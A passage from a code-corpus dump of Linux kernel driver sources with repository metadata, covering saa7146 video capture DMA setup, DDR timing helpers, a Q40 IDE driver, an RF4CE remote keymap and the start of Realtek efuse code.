vdma1.base_odd = vdma1.base_even;
vdma1.base_even = vdma1.prot_addr;
vdma1.pitch /= 2;
}
if ( 0 != vv->vflip ) {
vdma1.pitch *= -1;
}
vdma1.base_page = sfmt->swap;
vdma1.num_line_byte = (vv->standard->v_field<<16)+vv->standard->h_pixels;
saa7146_write_out_dma(dev, 1, &vdma1);
}
static void saa7146_set_output_format(struct saa7146_dev *dev, unsigned long palette)
{
u32 clip_format = saa7146_read(dev, CLIP_FORMAT_CTRL);
/* call helper function */
calculate_output_format_register(dev,palette,&clip_format);
/* update the hps registers */
saa7146_write(dev, CLIP_FORMAT_CTRL, clip_format);
saa7146_write(dev, MC2, (MASK_05 | MASK_21));
}
/* select input-source */
void saa7146_set_hps_source_and_sync(struct saa7146_dev *dev, int source, int sync)
{
struct saa7146_vv *vv = dev->vv_data;
u32 hps_ctrl = 0;
/* read old state */
hps_ctrl = saa7146_read(dev, HPS_CTRL);
hps_ctrl &= ~( MASK_31 | MASK_30 | MASK_28 );
hps_ctrl |= (source << 30) | (sync << 28);
/* write back & upload register */
saa7146_write(dev, HPS_CTRL, hps_ctrl);
saa7146_write(dev, MC2, (MASK_05 | MASK_21));
vv->current_hps_source = source;
vv->current_hps_sync = sync;
}
EXPORT_SYMBOL_GPL(saa7146_set_hps_source_and_sync);
int saa7146_enable_overlay(struct saa7146_fh *fh)
{
struct saa7146_dev *dev = fh->dev;
struct saa7146_vv *vv = dev->vv_data;
saa7146_set_window(dev, vv->ov.win.w.width, vv->ov.win.w.height, vv->ov.win.field);
saa7146_set_position(dev, vv->ov.win.w.left, vv->ov.win.w.top, vv->ov.win.w.height, vv->ov.win.field, vv->ov_fmt->pixelformat);
saa7146_set_output_format(dev, vv->ov_fmt->trans);
saa7146_set_clipping_rect(fh);
/* enable video dma1 */
saa7146_write(dev, MC1, (MASK_06 | MASK_22));
return 0;
}
void saa7146_disable_overlay(struct saa7146_fh *fh)
{
struct saa7146_dev *dev = fh->dev;
/* disable clipping + video dma1 */
saa7146_disable_clipping(dev);
saa7146_write(dev, MC1, MASK_22);
}
void saa7146_write_out_dma(struct saa7146_dev* dev, int which, struct saa7146_video_dma* vdma)
{
int where = 0;
if( which < 1 || which > 3) {
return;
}
/* calculate starting address */
where = (which-1)*0x18;
saa7146_write(dev, where, vdma->base_odd);
saa7146_write(dev, where+0x04, vdma->base_even);
saa7146_write(dev, where+0x08, vdma->prot_addr);
saa7146_write(dev, where+0x0c, vdma->pitch);
saa7146_write(dev, where+0x10, vdma->base_page);
saa7146_write(dev, where+0x14, vdma->num_line_byte);
/* upload */
saa7146_write(dev, MC2, (MASK_02<<(which-1))|(MASK_18<<(which-1)));
/*
printk("vdma%d.base_even: 0x%08x\n", which,vdma->base_even);
printk("vdma%d.base_odd: 0x%08x\n", which,vdma->base_odd);
printk("vdma%d.prot_addr: 0x%08x\n", which,vdma->prot_addr);
printk("vdma%d.base_page: 0x%08x\n", which,vdma->base_page);
printk("vdma%d.pitch: 0x%08x\n", which,vdma->pitch);
printk("vdma%d.num_line_byte: 0x%08x\n", which,vdma->num_line_byte);
*/
}
static int calculate_video_dma_grab_packed(struct saa7146_dev* dev, struct saa7146_buf *buf)
{
struct saa7146_vv *vv = dev->vv_data;
struct saa7146_video_dma vdma1;
struct saa7146_format *sfmt = saa7146_format_by_fourcc(dev,buf->fmt->pixelformat);
int width = buf->fmt->width;
int height = buf->fmt->height;
int bytesperline = buf->fmt->bytesperline;
enum v4l2_field field = buf->fmt->field;
int depth = sfmt->depth;
DEB_CAP("[size=%dx%d,fields=%s]\n",
width, height, v4l2_field_names[field]);
if( bytesperline != 0) {
vdma1.pitch = bytesperline*2;
} else {
vdma1.pitch = (width*depth*2)/8;
}
vdma1.num_line_byte = ((vv->standard->v_field<<16) + vv->standard->h_pixels);
vdma1.base_page = buf->pt[0].dma | ME1 | sfmt->swap;
if( 0 != vv->vflip ) {
vdma1.prot_addr = buf->pt[0].offset;
vdma1.base_even = buf->pt[0].offset+(vdma1.pitch/2)*height;
vdma1.base_odd = vdma1.base_even - (vdma1.pitch/2);
} else {
vdma1.base_even = buf->pt[0].offset;
vdma1.base_odd = vdma1.base_even + (vdma1.pitch/2);
vdma1.prot_addr = buf->pt[0].offset+(vdma1.pitch/2)*height;
}
if (V4L2_FIELD_HAS_BOTH(field)) {
} else if (field == V4L2_FIELD_ALTERNATE) {
/* fixme */
if ( vv->last_field == V4L2_FIELD_TOP ) {
vdma1.base_odd = vdma1.prot_addr;
vdma1.pitch /= 2;
} else if ( vv->last_field == V4L2_FIELD_BOTTOM ) {
vdma1.base_odd = vdma1.base_even;
vdma1.base_even = vdma1.prot_addr;
vdma1.pitch /= 2;
}
} else if (field == V4L2_FIELD_TOP) {
vdma1.base_odd = vdma1.prot_addr;
vdma1.pitch /= 2;
} else if (field == V4L2_FIELD_BOTTOM) {
vdma1.base_odd = vdma1.base_even;
vdma1.base_even = vdma1.prot_addr;
vdma1.pitch /= 2;
}
if( 0 != vv->vflip ) {
vdma1.pitch *= -1;
}
saa7146_write_out_dma(dev, 1, &vdma1);
return 0;
}
static int calc_planar_422(struct saa7146_vv *vv, struct saa7146_buf *buf, struct saa7146_video_dma *vdma2, struct saa7146_video_dma *vdma3)
{
int height = buf->fmt->height;
int width = buf->fmt->width;
vdma2->pitch = width;
vdma3->pitch = width;
/* fixme: look at bytesperline! */
if( 0 != vv->vflip ) {
vdma2->prot_addr = buf->pt[1].offset;
vdma2->base_even = ((vdma2->pitch/2)*height)+buf->pt[1].offset;
vdma2->base_odd = vdma2->base_even - (vdma2->pitch/2);
vdma3->prot_addr = buf->pt[2].offset;
vdma3->base_even = ((vdma3->pitch/2)*height)+buf->pt[2].offset;
vdma3->base_odd = vdma3->base_even - (vdma3->pitch/2);
} else {
vdma3->base_even = buf->pt[2].offset;
vdma3->base_odd = vdma3->base_even + (vdma3->pitch/2);
vdma3->prot_addr = (vdma3->pitch/2)*height+buf->pt[2].offset;
vdma2->base_even = buf->pt[1].offset;
vdma2->base_odd = vdma2->base_even + (vdma2->pitch/2);
vdma2->prot_addr = (vdma2->pitch/2)*height+buf->pt[1].offset;
}
return 0;
}
static int calc_planar_420(struct saa7146_vv *vv, struct saa7146_buf *buf, struct saa7146_video_dma *vdma2, struct saa7146_video_dma *vdma3)
{
int height = buf->fmt->height;
int width = buf->fmt->width;
vdma2->pitch = width/2;
vdma3->pitch = width/2;
if( 0 != vv->vflip ) {
vdma2->prot_addr = buf->pt[2].offset;
vdma2->base_even = ((vdma2->pitch/2)*height)+buf->pt[2].offset;
vdma2->base_odd = vdma2->base_even - (vdma2->pitch/2);
vdma3->prot_addr = buf->pt[1].offset;
vdma3->base_even = ((vdma3->pitch/2)*height)+buf->pt[1].offset;
vdma3->base_odd = vdma3->base_even - (vdma3->pitch/2);
} else {
vdma3->base_even = buf->pt[2].offset;
vdma3->base_odd = vdma3->base_even + (vdma3->pitch);
vdma3->prot_addr = (vdma3->pitch/2)*height+buf->pt[2].offset;
vdma2->base_even = buf->pt[1].offset;
vdma2->base_odd = vdma2->base_even + (vdma2->pitch);
vdma2->prot_addr = (vdma2->pitch/2)*height+buf->pt[1].offset;
}
return 0;
}
static int calculate_video_dma_grab_planar(struct saa7146_dev* dev, struct saa7146_buf *buf)
{
struct saa7146_vv *vv = dev->vv_data;
struct saa7146_video_dma vdma1;
struct saa7146_video_dma vdma2;
struct saa7146_video_dma vdma3;
struct saa7146_format *sfmt = saa7146_format_by_fourcc(dev,buf->fmt->pixelformat);
int width = buf->fmt->width;
int height = buf->fmt->height;
enum v4l2_field field = buf->fmt->field;
BUG_ON(0 == buf->pt[0].dma);
BUG_ON(0 == buf->pt[1].dma);
BUG_ON(0 == buf->pt[2].dma);
DEB_CAP("[size=%dx%d,fields=%s]\n",
width, height, v4l2_field_names[field]);
/* fixme: look at bytesperline! */
/* fixme: what happens for user space buffers here?. The offsets are
most likely wrong, this version here only works for page-aligned
buffers, modifications to the pagetable-functions are necessary...*/
vdma1.pitch = width*2;
vdma1.num_line_byte = ((vv->standard->v_field<<16) + vv->standard->h_pixels);
vdma1.base_page = buf->pt[0].dma | ME1;
if( 0 != vv->vflip ) {
vdma1.prot_addr = buf->pt[0].offset;
vdma1.base_even = ((vdma1.pitch/2)*height)+buf->pt[0].offset;
vdma1.base_odd = vdma1.base_even - (vdma1.pitch/2);
} else {
vdma1.base_even = buf->pt[0].offset;
vdma1.base_odd = vdma1.base_even + (vdma1.pitch/2);
vdma1.prot_addr = (vdma1.pitch/2)*height+buf->pt[0].offset;
}
vdma2.num_line_byte = 0; /* unused */
vdma2.base_page = buf->pt[1].dma | ME1;
vdma3.num_line_byte = 0; /* unused */
vdma3.base_page = buf->pt[2].dma | ME1;
switch( sfmt->depth ) {
case 12: {
calc_planar_420(vv,buf,&vdma2,&vdma3);
break;
}
case 16: {
calc_planar_422(vv,buf,&vdma2,&vdma3);
break;
}
default: {
return -1;
}
}
if (V4L2_FIELD_HAS_BOTH(field)) {
} else if (field == V4L2_FIELD_ALTERNATE) {
/* fixme */
vdma1.base_odd = vdma1.prot_addr;
vdma1.pitch /= 2;
vdma2.base_odd = vdma2.prot_addr;
vdma2.pitch /= 2;
vdma3.base_odd = vdma3.prot_addr;
vdma3.pitch /= 2;
} else if (field == V4L2_FIELD_TOP) {
vdma1.base_odd = vdma1.prot_addr;
vdma1.pitch /= 2;
vdma2.base_odd = vdma2.prot_addr;
vdma2.pitch /= 2;
vdma3.base_odd = vdma3.prot_addr;
vdma3.pitch /= 2;
} else if (field == V4L2_FIELD_BOTTOM) {
vdma1.base_odd = vdma1.base_even;
vdma1.base_even = vdma1.prot_addr;
vdma1.pitch /= 2;
vdma2.base_odd = vdma2.base_even;
vdma2.base_even = vdma2.prot_addr;
vdma2.pitch /= 2;
vdma3.base_odd = vdma3.base_even;
vdma3.base_even = vdma3.prot_addr;
vdma3.pitch /= 2;
}
if( 0 != vv->vflip ) {
vdma1.pitch *= -1;
vdma2.pitch *= -1;
vdma3.pitch *= -1;
}
saa7146_write_out_dma(dev, 1, &vdma1);
if( (sfmt->flags & FORMAT_BYTE_SWAP) != 0 ) {
saa7146_write_out_dma(dev, 3, &vdma2);
saa7146_write_out_dma(dev, 2, &vdma3);
} else {
saa7146_write_out_dma(dev, 2, &vdma2);
saa7146_write_out_dma(dev, 3, &vdma3);
}
return 0;
}
static void program_capture_engine(struct saa7146_dev *dev, int planar)
{
struct saa7146_vv *vv = dev->vv_data;
int count = 0;
unsigned long e_wait = vv->current_hps_sync == SAA7146_HPS_SYNC_PORT_A ? CMD_E_FID_A : CMD_E_FID_B;
unsigned long o_wait = vv->current_hps_sync == SAA7146_HPS_SYNC_PORT_A ? CMD_O_FID_A : CMD_O_FID_B;
/* wait for o_fid_a/b / e_fid_a/b toggle only if rps register 0 is not set*/
WRITE_RPS0(CMD_PAUSE | CMD_OAN | CMD_SIG0 | o_wait);
WRITE_RPS0(CMD_PAUSE | CMD_OAN | CMD_SIG0 | e_wait);
/* set rps register 0 */
WRITE_RPS0(CMD_WR_REG | (1 << 8) | (MC2/4));
WRITE_RPS0(MASK_27 | MASK_11);
/* turn on video-dma1 */
WRITE_RPS0(CMD_WR_REG_MASK | (MC1/4));
WRITE_RPS0(MASK_06 | MASK_22); /* => mask */
WRITE_RPS0(MASK_06 | MASK_22); /* => values */
if( 0 != planar ) {
/* turn on video-dma2 */
WRITE_RPS0(CMD_WR_REG_MASK | (MC1/4));
WRITE_RPS0(MASK_05 | MASK_21); /* => mask */
WRITE_RPS0(MASK_05 | MASK_21); /* => values */
/* turn on video-dma3 */
WRITE_RPS0(CMD_WR_REG_MASK | (MC1/4));
WRITE_RPS0(MASK_04 | MASK_20); /* => mask */
WRITE_RPS0(MASK_04 | MASK_20); /* => values */
}
/* wait for o_fid_a/b / e_fid_a/b toggle */
if ( vv->last_field == V4L2_FIELD_INTERLACED ) {
WRITE_RPS0(CMD_PAUSE | o_wait);
WRITE_RPS0(CMD_PAUSE | e_wait);
} else if ( vv->last_field == V4L2_FIELD_TOP ) {
WRITE_RPS0(CMD_PAUSE | (vv->current_hps_sync == SAA7146_HPS_SYNC_PORT_A ? MASK_10 : MASK_09));
WRITE_RPS0(CMD_PAUSE | o_wait);
} else if ( vv->last_field == V4L2_FIELD_BOTTOM ) {
WRITE_RPS0(CMD_PAUSE | (vv->current_hps_sync == SAA7146_HPS_SYNC_PORT_A ? MASK_10 : MASK_09));
WRITE_RPS0(CMD_PAUSE | e_wait);
}
/* turn off video-dma1 */
WRITE_RPS0(CMD_WR_REG_MASK | (MC1/4));
WRITE_RPS0(MASK_22 | MASK_06); /* => mask */
WRITE_RPS0(MASK_22); /* => values */
if( 0 != planar ) {
/* turn off video-dma2 */
WRITE_RPS0(CMD_WR_REG_MASK | (MC1/4));
WRITE_RPS0(MASK_05 | MASK_21); /* => mask */
WRITE_RPS0(MASK_21); /* => values */
/* turn off video-dma3 */
WRITE_RPS0(CMD_WR_REG_MASK | (MC1/4));
WRITE_RPS0(MASK_04 | MASK_20); /* => mask */
WRITE_RPS0(MASK_20); /* => values */
}
/* generate interrupt */
WRITE_RPS0(CMD_INTERRUPT);
/* stop */
WRITE_RPS0(CMD_STOP);
}
void saa7146_set_capture(struct saa7146_dev *dev, struct saa7146_buf *buf, struct saa7146_buf *next)
{
struct saa7146_format *sfmt = saa7146_format_by_fourcc(dev,buf->fmt->pixelformat);
struct saa7146_vv *vv = dev->vv_data;
u32 vdma1_prot_addr;
DEB_CAP("buf:%p, next:%p\n", buf, next);
vdma1_prot_addr = saa7146_read(dev, PROT_ADDR1);
if( 0 == vdma1_prot_addr ) {
/* clear out beginning of streaming bit (rps register 0)*/
DEB_CAP("forcing sync to new frame\n");
saa7146_write(dev, MC2, MASK_27 );
}
saa7146_set_window(dev, buf->fmt->width, buf->fmt->height, buf->fmt->field);
saa7146_set_output_format(dev, sfmt->trans);
saa7146_disable_clipping(dev);
if ( vv->last_field == V4L2_FIELD_INTERLACED ) {
} else if ( vv->last_field == V4L2_FIELD_TOP ) {
vv->last_field = V4L2_FIELD_BOTTOM;
} else if ( vv->last_field == V4L2_FIELD_BOTTOM ) {
vv->last_field = V4L2_FIELD_TOP;
}
if( 0 != IS_PLANAR(sfmt->trans)) {
calculate_video_dma_grab_planar(dev, buf);
program_capture_engine(dev,1);
} else {
calculate_video_dma_grab_packed(dev, buf);
program_capture_engine(dev,0);
}
/*
printk("vdma%d.base_even: 0x%08x\n", 1,saa7146_read(dev,BASE_EVEN1));
printk("vdma%d.base_odd: 0x%08x\n", 1,saa7146_read(dev,BASE_ODD1));
printk("vdma%d.prot_addr: 0x%08x\n", 1,saa7146_read(dev,PROT_ADDR1));
printk("vdma%d.base_page: 0x%08x\n", 1,saa7146_read(dev,BASE_PAGE1));
printk("vdma%d.pitch: 0x%08x\n", 1,saa7146_read(dev,PITCH1));
printk("vdma%d.num_line_byte: 0x%08x\n", 1,saa7146_read(dev,NUM_LINE_BYTE1));
printk("vdma%d => vptr : 0x%08x\n", 1,saa7146_read(dev,PCI_VDP1));
*/
/* write the address of the rps-program */
saa7146_write(dev, RPS_ADDR0, dev->d_rps0.dma_handle);
/* turn on rps */
saa7146_write(dev, MC1, (MASK_12 | MASK_28));
}
| gpl-2.0 |
k4k/linux | drivers/memory/of_memory.c | 4356 | 4915 | /*
* OpenFirmware helpers for memory drivers
*
* Copyright (C) 2012 Texas Instruments, Inc.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*/
#include <linux/device.h>
#include <linux/platform_device.h>
#include <linux/list.h>
#include <linux/of.h>
#include <linux/gfp.h>
#include <memory/jedec_ddr.h>
#include <linux/export.h>
/**
* of_get_min_tck() - extract min timing values for ddr
* @np: pointer to ddr device tree node
* @device: device requesting for min timing values
*
* Populates the lpddr2_min_tck structure by extracting data
* from device tree node. Returns a pointer to the populated
* structure. If any error in populating the structure, returns
* default min timings provided by JEDEC.
*/
const struct lpddr2_min_tck *of_get_min_tck(struct device_node *np,
struct device *dev)
{
int ret = 0;
struct lpddr2_min_tck *min;
min = devm_kzalloc(dev, sizeof(*min), GFP_KERNEL);
if (!min)
goto default_min_tck;
ret |= of_property_read_u32(np, "tRPab-min-tck", &min->tRPab);
ret |= of_property_read_u32(np, "tRCD-min-tck", &min->tRCD);
ret |= of_property_read_u32(np, "tWR-min-tck", &min->tWR);
ret |= of_property_read_u32(np, "tRASmin-min-tck", &min->tRASmin);
ret |= of_property_read_u32(np, "tRRD-min-tck", &min->tRRD);
ret |= of_property_read_u32(np, "tWTR-min-tck", &min->tWTR);
ret |= of_property_read_u32(np, "tXP-min-tck", &min->tXP);
ret |= of_property_read_u32(np, "tRTP-min-tck", &min->tRTP);
ret |= of_property_read_u32(np, "tCKE-min-tck", &min->tCKE);
ret |= of_property_read_u32(np, "tCKESR-min-tck", &min->tCKESR);
ret |= of_property_read_u32(np, "tFAW-min-tck", &min->tFAW);
if (ret) {
devm_kfree(dev, min);
goto default_min_tck;
}
return min;
default_min_tck:
dev_warn(dev, "%s: using default min-tck values\n", __func__);
return &lpddr2_jedec_min_tck;
}
EXPORT_SYMBOL(of_get_min_tck);
static int of_do_get_timings(struct device_node *np,
struct lpddr2_timings *tim)
{
int ret;
ret = of_property_read_u32(np, "max-freq", &tim->max_freq);
ret |= of_property_read_u32(np, "min-freq", &tim->min_freq);
ret |= of_property_read_u32(np, "tRPab", &tim->tRPab);
ret |= of_property_read_u32(np, "tRCD", &tim->tRCD);
ret |= of_property_read_u32(np, "tWR", &tim->tWR);
ret |= of_property_read_u32(np, "tRAS-min", &tim->tRAS_min);
ret |= of_property_read_u32(np, "tRRD", &tim->tRRD);
ret |= of_property_read_u32(np, "tWTR", &tim->tWTR);
ret |= of_property_read_u32(np, "tXP", &tim->tXP);
ret |= of_property_read_u32(np, "tRTP", &tim->tRTP);
ret |= of_property_read_u32(np, "tCKESR", &tim->tCKESR);
ret |= of_property_read_u32(np, "tDQSCK-max", &tim->tDQSCK_max);
ret |= of_property_read_u32(np, "tFAW", &tim->tFAW);
ret |= of_property_read_u32(np, "tZQCS", &tim->tZQCS);
ret |= of_property_read_u32(np, "tZQCL", &tim->tZQCL);
ret |= of_property_read_u32(np, "tZQinit", &tim->tZQinit);
ret |= of_property_read_u32(np, "tRAS-max-ns", &tim->tRAS_max_ns);
ret |= of_property_read_u32(np, "tDQSCK-max-derated",
&tim->tDQSCK_max_derated);
return ret;
}
/**
* of_get_ddr_timings() - extracts the ddr timings and updates no of
* frequencies available.
* @np_ddr: Pointer to ddr device tree node
* @dev: Device requesting for ddr timings
* @device_type: Type of ddr(LPDDR2 S2/S4)
* @nr_frequencies: No of frequencies available for ddr
* (updated by this function)
*
* Populates lpddr2_timings structure by extracting data from device
* tree node. Returns pointer to populated structure. If any error
* while populating, returns default timings provided by JEDEC.
*/
const struct lpddr2_timings *of_get_ddr_timings(struct device_node *np_ddr,
struct device *dev, u32 device_type, u32 *nr_frequencies)
{
struct lpddr2_timings *timings = NULL;
u32 arr_sz = 0, i = 0;
struct device_node *np_tim;
char *tim_compat;
switch (device_type) {
case DDR_TYPE_LPDDR2_S2:
case DDR_TYPE_LPDDR2_S4:
tim_compat = "jedec,lpddr2-timings";
break;
default:
dev_warn(dev, "%s: un-supported memory type\n", __func__);
}
for_each_child_of_node(np_ddr, np_tim)
if (of_device_is_compatible(np_tim, tim_compat))
arr_sz++;
if (arr_sz)
timings = devm_kzalloc(dev, sizeof(*timings) * arr_sz,
GFP_KERNEL);
if (!timings)
goto default_timings;
for_each_child_of_node(np_ddr, np_tim) {
if (of_device_is_compatible(np_tim, tim_compat)) {
if (of_do_get_timings(np_tim, &timings[i])) {
devm_kfree(dev, timings);
goto default_timings;
}
i++;
}
}
*nr_frequencies = arr_sz;
return timings;
default_timings:
dev_warn(dev, "%s: using default timings\n", __func__);
*nr_frequencies = ARRAY_SIZE(lpddr2_jedec_timings);
return lpddr2_jedec_timings;
}
EXPORT_SYMBOL(of_get_ddr_timings);
| gpl-2.0 |
ericli1989/linux-2.6.32.67 | drivers/ide/q40ide.c | 4612 | 4195 | /*
* Q40 I/O port IDE Driver
*
* (c) Richard Zidlicky
*
* This file is subject to the terms and conditions of the GNU General Public
* License. See the file COPYING in the main directory of this archive for
* more details.
*
*
*/
#include <linux/types.h>
#include <linux/mm.h>
#include <linux/interrupt.h>
#include <linux/blkdev.h>
#include <linux/ide.h>
#include <asm/ide.h>
/*
* Bases of the IDE interfaces
*/
#define Q40IDE_NUM_HWIFS 2
#define PCIDE_BASE1 0x1f0
#define PCIDE_BASE2 0x170
#define PCIDE_BASE3 0x1e8
#define PCIDE_BASE4 0x168
#define PCIDE_BASE5 0x1e0
#define PCIDE_BASE6 0x160
static const unsigned long pcide_bases[Q40IDE_NUM_HWIFS] = {
PCIDE_BASE1, PCIDE_BASE2, /* PCIDE_BASE3, PCIDE_BASE4 , PCIDE_BASE5,
PCIDE_BASE6 */
};
static int q40ide_default_irq(unsigned long base)
{
switch (base) {
case 0x1f0: return 14;
case 0x170: return 15;
case 0x1e8: return 11;
default:
return 0;
}
}
/*
* Addresses are pretranslated for Q40 ISA access.
*/
static void q40_ide_setup_ports(struct ide_hw *hw, unsigned long base, int irq)
{
memset(hw, 0, sizeof(*hw));
/* BIG FAT WARNING:
assumption: only DATA port is ever used in 16 bit mode */
hw->io_ports.data_addr = Q40_ISA_IO_W(base);
hw->io_ports.error_addr = Q40_ISA_IO_B(base + 1);
hw->io_ports.nsect_addr = Q40_ISA_IO_B(base + 2);
hw->io_ports.lbal_addr = Q40_ISA_IO_B(base + 3);
hw->io_ports.lbam_addr = Q40_ISA_IO_B(base + 4);
hw->io_ports.lbah_addr = Q40_ISA_IO_B(base + 5);
hw->io_ports.device_addr = Q40_ISA_IO_B(base + 6);
hw->io_ports.status_addr = Q40_ISA_IO_B(base + 7);
hw->io_ports.ctl_addr = Q40_ISA_IO_B(base + 0x206);
hw->irq = irq;
}
static void q40ide_input_data(ide_drive_t *drive, struct ide_cmd *cmd,
void *buf, unsigned int len)
{
unsigned long data_addr = drive->hwif->io_ports.data_addr;
if (drive->media == ide_disk && cmd && (cmd->tf_flags & IDE_TFLAG_FS)) {
__ide_mm_insw(data_addr, buf, (len + 1) / 2);
return;
}
raw_insw_swapw((u16 *)data_addr, buf, (len + 1) / 2);
}
static void q40ide_output_data(ide_drive_t *drive, struct ide_cmd *cmd,
void *buf, unsigned int len)
{
unsigned long data_addr = drive->hwif->io_ports.data_addr;
if (drive->media == ide_disk && cmd && (cmd->tf_flags & IDE_TFLAG_FS)) {
__ide_mm_outsw(data_addr, buf, (len + 1) / 2);
return;
}
raw_outsw_swapw((u16 *)data_addr, buf, (len + 1) / 2);
}
/* Q40 has a byte-swapped IDE interface */
static const struct ide_tp_ops q40ide_tp_ops = {
.exec_command = ide_exec_command,
.read_status = ide_read_status,
.read_altstatus = ide_read_altstatus,
.write_devctl = ide_write_devctl,
.dev_select = ide_dev_select,
.tf_load = ide_tf_load,
.tf_read = ide_tf_read,
.input_data = q40ide_input_data,
.output_data = q40ide_output_data,
};
static const struct ide_port_info q40ide_port_info = {
.tp_ops = &q40ide_tp_ops,
.host_flags = IDE_HFLAG_MMIO | IDE_HFLAG_NO_DMA,
.irq_flags = IRQF_SHARED,
.chipset = ide_generic,
};
/*
* the static array is needed to have the name reported in /proc/ioports,
* hwif->name unfortunately isn't available yet
*/
static const char *q40_ide_names[Q40IDE_NUM_HWIFS]={
"ide0", "ide1"
};
/*
* Probe for Q40 IDE interfaces
*/
static int __init q40ide_init(void)
{
int i;
struct ide_hw hw[Q40IDE_NUM_HWIFS], *hws[] = { NULL, NULL };
if (!MACH_IS_Q40)
return -ENODEV;
printk(KERN_INFO "ide: Q40 IDE controller\n");
for (i = 0; i < Q40IDE_NUM_HWIFS; i++) {
const char *name = q40_ide_names[i];
if (!request_region(pcide_bases[i], 8, name)) {
printk("could not reserve ports %lx-%lx for %s\n",
pcide_bases[i],pcide_bases[i]+8,name);
continue;
}
if (!request_region(pcide_bases[i]+0x206, 1, name)) {
printk("could not reserve port %lx for %s\n",
pcide_bases[i]+0x206,name);
release_region(pcide_bases[i], 8);
continue;
}
q40_ide_setup_ports(&hw[i], pcide_bases[i],
q40ide_default_irq(pcide_bases[i]));
hws[i] = &hw[i];
}
return ide_host_add(&q40ide_port_info, hws, Q40IDE_NUM_HWIFS, NULL);
}
module_init(q40ide_init);
MODULE_LICENSE("GPL");
| gpl-2.0 |
lordeko/Alucard-Kernel-jfltexx | drivers/media/rc/keymaps/rc-ue-rf4ce.c | 4612 | 2008 | /* Copyright (c) 2012, The Linux Foundation. All rights reserved.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 and
* only version 2 as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/
#include <linux/module.h>
#include <media/rc-map.h>
static struct rc_map_table ue_rf4ce[] = {
{ 0x0a, KEY_SETUP },
{ 0x6b, KEY_POWER },
{ 0x00, KEY_OK },
{ 0x03, KEY_LEFT },
{ 0x04, KEY_RIGHT },
{ 0x01, KEY_UP },
{ 0x02, KEY_DOWN },
{ 0x53, KEY_HOMEPAGE },
{ 0x0d, KEY_EXIT },
{ 0x72, KEY_TV },
{ 0x73, KEY_VIDEO },
{ 0x74, KEY_PC },
{ 0x71, KEY_AUX },
{ 0x45, KEY_STOP },
{ 0x0b, KEY_LIST },
{ 0x47, KEY_RECORD },
{ 0x48, KEY_REWIND },
{ 0x44, KEY_PLAY },
{ 0x49, KEY_FASTFORWARD },
{ 0x4c, KEY_BACK },
{ 0x46, KEY_PAUSE },
{ 0x4b, KEY_NEXT },
{ 0x41, KEY_VOLUMEUP },
{ 0x42, KEY_VOLUMEDOWN },
{ 0x32, KEY_LAST },
{ 0x43, KEY_MUTE },
{ 0x30, KEY_CHANNELUP },
{ 0x31, KEY_CHANNELDOWN },
{ 0x20, KEY_0 },
{ 0x21, KEY_1 },
{ 0x22, KEY_2 },
{ 0x23, KEY_3 },
{ 0x24, KEY_4 },
{ 0x25, KEY_5 },
{ 0x26, KEY_6 },
{ 0x27, KEY_7 },
{ 0x28, KEY_8 },
{ 0x29, KEY_9 },
{ 0x34, KEY_TV2 },
{ 0x2b, KEY_ENTER },
{ 0x35, KEY_INFO },
{ 0x09, KEY_MENU },
};
static struct rc_map_list ue_rf4ce_map = {
.map = {
.scan = ue_rf4ce,
.size = ARRAY_SIZE(ue_rf4ce),
.rc_type = RC_TYPE_OTHER,
.name = RC_MAP_UE_RF4CE,
}
};
static int __init init_rc_map_ue_rf4ce(void)
{
return rc_map_register(&ue_rf4ce_map);
}
static void __exit exit_rc_map_ue_rf4ce(void)
{
rc_map_unregister(&ue_rf4ce_map);
}
module_init(init_rc_map_ue_rf4ce)
module_exit(exit_rc_map_ue_rf4ce)
MODULE_DESCRIPTION("UE RF4CE Remote Keymap ");
MODULE_LICENSE("GPL v2");
| gpl-2.0 |
bensonhsu2013/diff-T210-T110 | drivers/net/wireless/rtlwifi/efuse.c | 4868 | 33037 | /******************************************************************************
*
* Copyright(c) 2009-2012 Realtek Corporation.
*
* Tmis program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* Tmis program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along with
* tmis program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110, USA
*
* Tme full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <wlanfae@realtek.com>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
*
* Larry Finger <Larry.Finger@lwfinger.net>
*
*****************************************************************************/
#include <linux/export.h>
#include "wifi.h"
#include "efuse.h"
static const u8 MAX_PGPKT_SIZE = 9;
static const u8 PGPKT_DATA_SIZE = 8;
static const int EFUSE_MAX_SIZE = 512;
static const u8 EFUSE_OOB_PROTECT_BYTES = 15;
static const struct efuse_map RTL8712_SDIO_EFUSE_TABLE[] = {
{0, 0, 0, 2},
{0, 1, 0, 2},
{0, 2, 0, 2},
{1, 0, 0, 1},
{1, 0, 1, 1},
{1, 1, 0, 1},
{1, 1, 1, 3},
{1, 3, 0, 17},
{3, 3, 1, 48},
{10, 0, 0, 6},
{10, 3, 0, 1},
{10, 3, 1, 1},
{11, 0, 0, 28}
};
static void efuse_shadow_read_1byte(struct ieee80211_hw *hw, u16 offset,
u8 *value);
static void efuse_shadow_read_2byte(struct ieee80211_hw *hw, u16 offset,
u16 *value);
static void efuse_shadow_read_4byte(struct ieee80211_hw *hw, u16 offset,
u32 *value);
static void efuse_shadow_write_1byte(struct ieee80211_hw *hw, u16 offset,
u8 value);
static void efuse_shadow_write_2byte(struct ieee80211_hw *hw, u16 offset,
u16 value);
static void efuse_shadow_write_4byte(struct ieee80211_hw *hw, u16 offset,
u32 value);
static int efuse_one_byte_read(struct ieee80211_hw *hw, u16 addr,
u8 *data);
static int efuse_one_byte_write(struct ieee80211_hw *hw, u16 addr,
u8 data);
static void efuse_read_all_map(struct ieee80211_hw *hw, u8 *efuse);
static int efuse_pg_packet_read(struct ieee80211_hw *hw, u8 offset,
u8 *data);
